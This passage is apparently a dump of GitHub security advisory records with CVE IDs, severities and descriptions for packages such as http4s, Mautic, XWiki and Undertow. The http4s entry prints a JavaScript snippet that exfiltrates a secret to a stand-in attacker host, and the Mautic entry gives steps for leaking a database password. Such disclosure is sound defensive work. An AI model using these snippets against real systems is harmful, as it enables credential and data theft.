[info@inveniosoftware.org](mailto:info@inveniosoftware.org)
{'CVE-2019-1020006'}
2021-09-07T20:41:31Z
2019-07-16T00:52:10Z
MODERATE
6.1
{'CWE-74'}
{'https://github.com/inveniosoftware/invenio-app/security/advisories/GHSA-94mf-xfg5-r247', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1020006', 'https://github.com/advisories/GHSA-94mf-xfg5-r247'}
null
GHSA
GHSA-52cf-226f-rhr6
Default CORS config allows any origin with credentials
### Impact #### Origin reflection attack The default CORS configuration is vulnerable to an origin reflection attack. Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com: ```scala val routes: HttpRoutes[F] = HttpRoutes.of { case req if req.pathInfo === "/secret" => Response(Ok).withEntity(password).pure[F] } val app = CORS(routes.orNotFound) ``` The following request is made to our server: ```http GET /secret HTTP/1.1 Host: vulnerable.example.com Origin: https://adversary.example.net Cookie: sessionId=... ``` When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting. Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin: ```http HTTP/1.1 200 OK Access-Control-Allow-Origin: https://adversary.example.org Access-Control-Allow-Credentials: true Content-Type: text/plain p4ssw0rd ``` A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`: ```javascript var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://vulnerable.example.org/secret',true); req.withCredentials = true; req.send(); function reqListener() { location='//bad-people.example.org/log?key='+this.responseText; }; ``` #### Null origin attack The middleware is also susceptible to a Null Origin Attack. A user agent may send `Origin: null` when a request is made from a sandboxed iframe. The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above. ### Patches The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures: ### Migration The `CORS` object exposes a default `CORSPolicy` via `CORS.policy`. This can be configured with various `with*` methods, like any http4s builder. Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware: ```scala val routes: HttpRoutes[F] = ??? val cors = CORS.policy .withAllowOriginAll .withAllowCredentials(false) .apply(routes) ``` ### Workarounds It is possible to be safe in unpatched versions, but note the following defects exist: * The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response. * Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers. * Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches. * Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations. * Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests. This should be harmless in practice. * Needlessly sends `Access-Control-Max-Age` header on non-preflight requests. This should be harmless in practice. * Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header. This should be harmless in practice. #### Explicit origins In versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`. ##### 0.21.x ```scala val routes: HttpRoutes[F] = ??? val config = CORS.DefaultConfig.copy( anyOrigin = false, allowOrigins = Set("http://trusted.example.com") ) val cors = CORS(routes, config) ``` ###### 0.22.x, 0.23.x, 1.x ```scala val routes: HttpRoutes[F] = ??? val config = CORSConfig.default .withAnyOrigin(false) .withAllowedOrigins(Set("http://trusted.example.com")) val cors = CORS(routes, config) ``` #### Disable credentials Alternatively, sharing responses tainted by credentials can be deprecated. ##### 0.21.x ```scala val routes: HttpRoutes[F] = ??? val config = CORS.DefaultConfig.copy(allowCredentials = false) val cors = CORS(routes, config) ``` ##### 0.22.x, 0.23.x, 1.x ```scala val routes: HttpRoutes[F] = ??? val config = CORSConfig.default.withAllowedCredentials(false) val cors = CORS(routes, config) ``` ### References * The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) * [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md) ### For more information If you have any questions or comments about this advisory: * Open an issue in [GitHub](http://github.com/http4s/http4s) * Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)
{'CVE-2021-39185'}
2022-04-19T19:03:07Z
2021-09-02T16:52:18Z
CRITICAL
9.1
{'CWE-346'}
{'https://github.com/advisories/GHSA-52cf-226f-rhr6', 'https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6', 'https://github.com/http4s/http4s/releases/tag/v0.23.2', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39185'}
null
GHSA
GHSA-4hjq-422q-4vpx
Secret data exfiltration via symfony parameters
### Impact Symfony parameters (which is what Mautic transforms configuration parameters into) can be used within other Symfony parameters by design. However, this also means that an admin who is normally not privy to certain parameters, such as database credentials, could expose them by leveraging any of the free text fields in Mautic’s configuration that are used in publicly facing parts of the application. For example, 1. Go to Configuration page -> Landing Page Settings -> Analytics script and enter this: <`script> console.log("db password is: %mautic.db_password%"); </script>` 2. Visit any landing page and open the JS dev console. You will see the following message with real instance db password: `db password is: <real password>` Risk rating: ModerateCVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L ### Patches Upgrade to 3.3.2 ### Workarounds No ### References No ### For more information If you have any questions or comments about this advisory: * Email us at [security@mautic.org](mailto:security@mautic.org)
{'CVE-2021-27908'}
2022-04-19T19:02:51Z
2021-04-06T17:20:58Z
MODERATE
5.8
{'CWE-732'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-27908', 'https://github.com/advisories/GHSA-4hjq-422q-4vpx', 'https://github.com/mautic/mautic/security/advisories/GHSA-4hjq-422q-4vpx'}
null
GHSA
GHSA-8c3f-x5f9-6h62
Command injection in @diez/generation
The `@diez/generation` npm package is a client for Diez. The locateFont method of @diez/generation has a command injection vulnerability. Clients of the @diez/generation library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. All versions of this package are vulnerable as of the writing of this CVE.
{'CVE-2021-32830'}
2021-09-02T17:08:20Z
2021-09-02T17:08:20Z
LOW
3.9
{'CWE-77', 'CWE-78'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-32830', 'https://www.npmjs.com/package/@diez/generation', 'https://securitylab.github.com/advisories/GHSL-2021-061-diez-generation-cmd-injection/', 'https://github.com/advisories/GHSA-8c3f-x5f9-6h62'}
null
GHSA
GHSA-vg35-vc9f-q7x2
Improper Restriction of XML External Entity Reference in ladon
Ladon since 0.6.1 (since ebef0aae48af78c159b6fce81bc6f5e7e0ddb059) is affected by: XML External Entity (XXE). The impact is: Information Disclosure, reading files and reaching internal network endpoints. The component is: SOAP request handlers. For instance: https://bitbucket.org/jakobsg/ladon/src/42944fc012a3a48214791c120ee5619434505067/src/ladon/interfaces/soap.py#lines-688. The attack vector is: Send a specially crafted SOAP call.
{'CVE-2019-1010268'}
2022-03-22T18:19:05Z
2019-07-26T16:09:54Z
CRITICAL
9.8
{'CWE-611'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-1010268', 'https://github.com/advisories/GHSA-vg35-vc9f-q7x2', 'https://bitbucket.org/jakobsg/ladon/src/42944fc012a3a48214791c120ee5619434505067/src/ladon/interfaces/soap.py#lines-688', 'https://www.exploit-db.com/exploits/43113', 'https://bitbucket.org/jakobsg/ladon/pull-requests/9'}
null
GHSA
GHSA-jwgx-9mmh-684w
Credential exposure through log files in Undertow
A vulnerability was found in Undertow web server before 2.0.21. An information exposure of plain text credentials through log files because Connectors.executeRootHandler:402 logs the HttpServerExchange object at ERROR level using UndertowLogger.REQUEST_LOGGER.undertowRequestFailed(t, exchange)
{'CVE-2019-3888'}
2022-02-11T21:13:16Z
2019-06-13T20:02:56Z
CRITICAL
9.8
{'CWE-532'}
{'https://access.redhat.com/errata/RHSA-2019:2998', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3888', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3888', 'http://www.securityfocus.com/bid/108739', 'https://security.netapp.com/advisory/ntap-20220210-0019/', 'https://github.com/advisories/GHSA-jwgx-9mmh-684w', 'https://access.redhat.com/errata/RHSA-2019:2439', 'https://access.redhat.com/errata/RHSA-2020:0727'}
null
GHSA
GHSA-mr95-9rr4-668f
High severity vulnerability that affects com.typesafe.akka:akka-actor_2.11 and com.typesafe.akka:akka-actor_2.12
Lightbend Akka 2.5.x before 2.5.16 allows message disclosure and modification because of an RNG error. A random number generator is used in Akka Remoting for TLS (both classic and Artery Remoting). Akka allows configuration of custom random number generators. For historical reasons, Akka included the AES128CounterSecureRNG and AES256CounterSecureRNG random number generators. The implementations had a bug that caused the generated numbers to be repeated after only a few bytes. The custom RNG implementations were not configured by default but examples in the documentation showed (and therefore implicitly recommended) using the custom ones. This can be used by an attacker to compromise the communication if these random number generators are enabled in configuration. It would be possible to eavesdrop, replay, or modify the messages sent with Akka Remoting/Cluster.
{'CVE-2018-16115'}
2021-09-15T20:58:47Z
2018-10-22T20:44:26Z
CRITICAL
9.1
{'CWE-338'}
{'https://github.com/advisories/GHSA-mr95-9rr4-668f', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16115', 'https://doc.akka.io/docs/akka/current/security/2018-08-29-aes-rng.html'}
null
GHSA
GHSA-rfmp-jvr7-hx78
Inadequate Encryption Strength in Apache NiFi
In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were protected by mandating TLS v1.2, as well as listening connections established by processors like ListenHTTP, HandleHttpRequest, etc. However intracluster communication such as cluster request replication, Site-to-Site, and load balanced queues continued to support TLS v1.0 or v1.1.
{'CVE-2020-9491'}
2022-04-29T20:27:44Z
2022-01-06T20:41:06Z
HIGH
7.5
{'CWE-327'}
{'https://nifi.apache.org/security#CVE-2020-9491', 'https://lists.apache.org/thread.html/re48582efe2ac973f8cff55c8b346825cb491c71935e15ab2d61ef3bf@%3Ccommits.nifi.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9491', 'https://lists.apache.org/thread.html/r2d9c21f9ec35d66f2bb42f8abe876dabd786166b6284e9a33582c718@%3Ccommits.nifi.apache.org%3E', 'https://github.com/advisories/GHSA-rfmp-jvr7-hx78', 'https://github.com/apache/nifi/commit/441781cec50f77d9f1e65093f55bbd614b8c5ec6'}
null
GHSA
GHSA-wg4r-q74r-p7c8
Cross-site Scripting in ShowDoc
ShowDoc is vulnerable to stored cross-site scripting due to unrestricted file upload in versions 2.10.3 and prior. A patch is available and anticipated to be part of version 2.10.4.
{'CVE-2022-0941'}
2022-03-23T15:42:50Z
2022-03-15T00:01:03Z
MODERATE
5.4
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0941', 'https://huntr.dev/bounties/040a910e-e689-4fcb-9e4f-95206515d1bc', 'https://github.com/star7th/showdoc/commit/4b6e6603c714aab1de346c5f5cb0bbb4c871be1f', 'https://github.com/advisories/GHSA-wg4r-q74r-p7c8'}
null
GHSA
GHSA-5hv6-mh8q-q9v8
RCE in XWiki
### Impact Any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution. ### Patches It has been patched in both version XWiki 12.5 and XWiki 11.10.6. ### Workarounds The only workaround is to give SCRIPT right only to trusted users. ### References https://jira.xwiki.org/browse/XWIKI-17423 It's been reported by the GitHub Security Lab under https://jira.xwiki.org/browse/XWIKI-17141. ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki](https://jira.xwiki.org) * Email us at [our security mailing list](mailto:security@xwiki.org)
{'CVE-2020-15252'}
2021-11-19T14:41:16Z
2020-10-16T16:55:49Z
HIGH
8.5
{'CWE-94', 'CWE-74'}
{'https://jira.xwiki.org/browse/XWIKI-17141', 'https://github.com/advisories/GHSA-5hv6-mh8q-q9v8', 'https://jira.xwiki.org/browse/XWIKI-17423', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5hv6-mh8q-q9v8', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15252'}
null
GHSA
GHSA-64j8-7gp2-xjx5
Data races in try-mutex
An issue was discovered in the try-mutex crate before 0.3.0 for Rust. TryMutex<T> allows cross-thread sending of a non-Send type.
{'CVE-2020-35924'}
2021-08-25T20:50:28Z
2021-08-25T20:50:28Z
MODERATE
5.5
{'CWE-787'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-35924', 'https://github.com/mpdn/try-mutex/issues/2', 'https://rustsec.org/advisories/RUSTSEC-2020-0087.html', 'https://github.com/advisories/GHSA-64j8-7gp2-xjx5'}
null
GHSA
GHSA-j3jw-j2j8-2wv9
Improper Verification of Cryptographic Signature in starkbank-ecdsa
The verify function in the Stark Bank .NET ECDSA library (ecdsa-dotnet) 1.3.1 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.
{'CVE-2021-43569'}
2021-11-15T14:43:40Z
2021-11-10T20:58:03Z
CRITICAL
9.8
{'CWE-347'}
{'https://github.com/starkbank/ecdsa-dotnet/releases/tag/v1.3.2', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43569', 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/', 'https://github.com/advisories/GHSA-j3jw-j2j8-2wv9'}
null
GHSA
GHSA-6mq2-37j5-w6r6
Moderate severity vulnerability that affects webrick
WEBrick 1.3.1 in Ruby 1.8.6 through patchlevel 383, 1.8.7 through patchlevel 248, 1.8.8dev, 1.9.1 through patchlevel 376, and 1.9.2dev writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
{'CVE-2009-4492'}
2022-04-19T19:03:27Z
2017-10-24T18:33:38Z
MODERATE
0
{'CWE-20'}
{'http://www.securityfocus.com/bid/37710', 'https://github.com/advisories/GHSA-6mq2-37j5-w6r6', 'http://www.ush.it/team/ush/hack_httpd_escape/adv.txt', 'http://secunia.com/advisories/37949', 'https://nvd.nist.gov/vuln/detail/CVE-2009-4492', 'http://www.vupen.com/english/advisories/2010/0089', 'http://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection', 'http://www.redhat.com/support/errata/RHSA-2011-0909.html', 'http://www.redhat.com/support/errata/RHSA-2011-0908.html', 'http://www.securityfocus.com/archive/1/508830/100/0/threaded', 'http://securitytracker.com/id?1023429'}
null
GHSA
GHSA-vh4p-6j7g-f4j9
Data races in lock_api
An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of MappedRwLockReadGuard unsoundness.
{'CVE-2020-35911'}
2021-08-25T20:49:56Z
2021-08-25T20:49:56Z
MODERATE
4.7
{'CWE-362'}
{'https://github.com/Amanieu/parking_lot/pull/262', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35911', 'https://github.com/advisories/GHSA-vh4p-6j7g-f4j9', 'https://rustsec.org/advisories/RUSTSEC-2020-0070.html'}
null
GHSA
GHSA-rwpr-83g3-96g7
Cross-site scripting in padrino-contrib
The breadcrumbs contributed module through 0.2.0 for Padrino Framework allows XSS via a caption.
{'CVE-2019-16145'}
2021-08-17T22:29:55Z
2019-09-23T18:33:07Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/advisories/GHSA-rwpr-83g3-96g7', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16145', 'https://github.com/padrino/padrino-contrib/pull/35'}
null